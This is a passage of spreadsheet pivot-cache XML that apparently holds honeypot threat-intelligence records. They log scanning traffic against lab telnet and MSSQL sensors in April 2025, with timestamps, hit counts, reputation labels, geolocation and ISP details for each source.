    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fe:1418"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2554"/>
    <x v="2554"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T18:49:33"/>
    <d v="2025-04-08T18:49:33"/>
    <d v="2025-04-08T18:49:33"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>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d8:154a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2555"/>
    <x v="2555"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T18:48:54"/>
    <d v="2025-04-08T18:38:25"/>
    <d v="2025-04-08T18:48:54"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c0:eda2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2556"/>
    <x v="2556"/>
    <s v="NA&amp;&amp;220-133-63-69.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-08T18:45:13"/>
    <d v="2025-03-16T23:49:00"/>
    <d v="2025-04-08T18:45:13"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&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one"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc85:3f45"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2557"/>
    <x v="2557"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T18:25:01"/>
    <d v="2025-04-08T18:20:32"/>
    <d v="2025-04-08T18:25:01"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f1:ccbb"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2558"/>
    <x v="2558"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T17:59:34"/>
    <d v="2025-04-08T17:51:17"/>
    <d v="2025-04-08T17:59:34"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Mumbai"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:4e3b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2559"/>
    <x v="2559"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T17:59:11"/>
    <d v="2025-04-08T17:58:25"/>
    <d v="2025-04-08T17:59:11"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai (Parel)"/>
    <s v="1275339"/>
    <s v="400012"/>
    <s v="19.0027"/>
    <s v="72.8286"/>
    <s v="17488"/>
    <s v="HATHWAY CABLE AND DATACOM LIMITED"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="residential"/>
    <s v="Hathway Cable and Datacom Pvt Ltd"/>
    <s v="2008-07-25"/>
    <s v="HATHWAY-NET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7361:202d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2560"/>
    <x v="2560"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T17:23:03"/>
    <d v="2025-04-08T17:23:03"/>
    <d v="2025-04-08T17:23:03"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai (Parel)"/>
    <s v="1275339"/>
    <s v="400012"/>
    <s v="19.0027"/>
    <s v="72.8286"/>
    <s v="17488"/>
    <s v="HATHWAY-NET-AP"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="consumer"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7363:314a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2561"/>
    <x v="2561"/>
    <s v="p2645169-ipxg00g01fukuokachu.fukuoka.ocn.ne.jp"/>
    <x v="0"/>
    <d v="2025-04-08T17:19:28"/>
    <d v="2025-04-08T17:19:28"/>
    <d v="2025-04-08T17:19:28"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="40"/>
    <s v="Fukuoka"/>
    <s v="Fukuoka City"/>
    <s v="Fukuoka"/>
    <s v="1863967"/>
    <s v="NA"/>
    <s v="33.5902"/>
    <s v="130.402"/>
    <s v="4713"/>
    <s v="OCN NTT Communications Corporation"/>
    <s v="NTT Communications Corporation"/>
    <s v="corporate"/>
    <s v="Open Computer Network"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="['ns1.ocn.ad.jp', 'ns2.ocn.ad.jp']"/>
    <s v="NA"/>
    <s v="Connected (2025/11/30)"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:99cf:e5a9"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2562"/>
    <x v="2562"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T17:18:18"/>
    <d v="2025-04-08T12:04:59"/>
    <d v="2025-04-08T17:18:18"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay-General"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75dd:7ac4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2563"/>
    <x v="2563"/>
    <s v="node-6kh.pool-101-51.dynamic.totinternet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-08T17:17:10"/>
    <d v="2025-04-08T17:14:58"/>
    <d v="2025-04-08T17:17:10"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Lak Si"/>
    <s v="Khwaeng Thung Song Hong"/>
    <s v="1613187"/>
    <s v="NA"/>
    <s v="13.8983"/>
    <s v="100.582"/>
    <s v="23969"/>
    <s v="TOT Public Company Limited"/>
    <s v="TOT Public Company Limited"/>
    <s v="business"/>
    <s v="TOT Public Company Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6533:2141"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2564"/>
    <x v="2564"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T17:07:24"/>
    <d v="2025-01-28T12:44:50"/>
    <d v="2025-04-08T17:07:24"/>
    <n v="41"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA&amp;&amp;65279"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="23"/>
    <s v="Zaporizhzhia"/>
    <s v="Zaporizhzhia Raion"/>
    <s v="Zaporizhzhya"/>
    <s v="687700"/>
    <s v="NA"/>
    <s v="47.8388"/>
    <s v="35.1396"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="Golden Telecom LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e76:4e7e"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2565"/>
    <x v="2565"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T17:07:09"/>
    <d v="2023-07-27T08:14:25"/>
    <d v="2025-04-08T17:07:09"/>
    <n v="1535"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_LDAP_H28&amp;&amp;SMA-LAB_NTP_H35&amp;&amp;SMA-LAB_IRC_H35&amp;&amp;SMA-LAB_IPP_H9&amp;&amp;SMA-LAB_REDIS_H4&amp;&amp;SMA-LAB_HTTPS_H20&amp;&amp;SMA-LAB_SOCKS5_H31&amp;&amp;SMA-LAB_SSH_H45&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H47"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;389&amp;&amp;123&amp;&amp;6667&amp;&amp;631&amp;&amp;6379&amp;&amp;443&amp;&amp;1080&amp;&amp;22&amp;&amp;42123&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="23"/>
    <s v="Zaporizhzhia"/>
    <s v="Zaporizhzhia Raion"/>
    <s v="Zaporizhzhya"/>
    <s v="687700"/>
    <s v="NA"/>
    <s v="47.8388"/>
    <s v="35.1396"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="Golden Telecom LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e77:76a9"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2566"/>
    <x v="2566"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T17:06:59"/>
    <d v="2023-09-17T15:56:48"/>
    <d v="2025-04-08T17:06:59"/>
    <n v="951"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H20"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;NA&amp;&amp;40317&amp;&amp;9063&amp;&amp;49002"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="43"/>
    <s v="North Chungcheong"/>
    <s v="Cheongju-si"/>
    <s v="Cheongju-si (Jibuk-dong)"/>
    <s v="1845604"/>
    <s v="28759"/>
    <s v="36.5946"/>
    <s v="127.51"/>
    <s v="9319"/>
    <s v="HCN CHUNGBUK CABLE TV SYSTEMS"/>
    <s v="HYUNDAI HCN Chungbuk Systems Co.Ltd"/>
    <s v="business"/>
    <s v="HYUNDAI COMMUNICATIONS &amp; NETWORK"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7048:e4a9"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2567"/>
    <x v="2567"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T17:06:57"/>
    <d v="2025-01-19T11:43:27"/>
    <d v="2025-04-08T17:06:57"/>
    <n v="37"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="23"/>
    <s v="Zaporizhzhia"/>
    <s v="Zaporizhzhia Raion"/>
    <s v="Zaporizhzhya"/>
    <s v="687700"/>
    <s v="NA"/>
    <s v="47.8388"/>
    <s v="35.1396"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="Golden Telecom LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e76:4be3"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2568"/>
    <x v="2568"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T17:06:53"/>
    <d v="2025-02-10T07:16:51"/>
    <d v="2025-04-08T17:06:53"/>
    <n v="112"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;49994&amp;&amp;19054&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b289:b4d4"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2569"/>
    <x v="2569"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T17:06:44"/>
    <d v="2024-12-20T23:51:45"/>
    <d v="2025-04-08T17:06:44"/>
    <n v="53"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="23&amp;&amp;36844&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
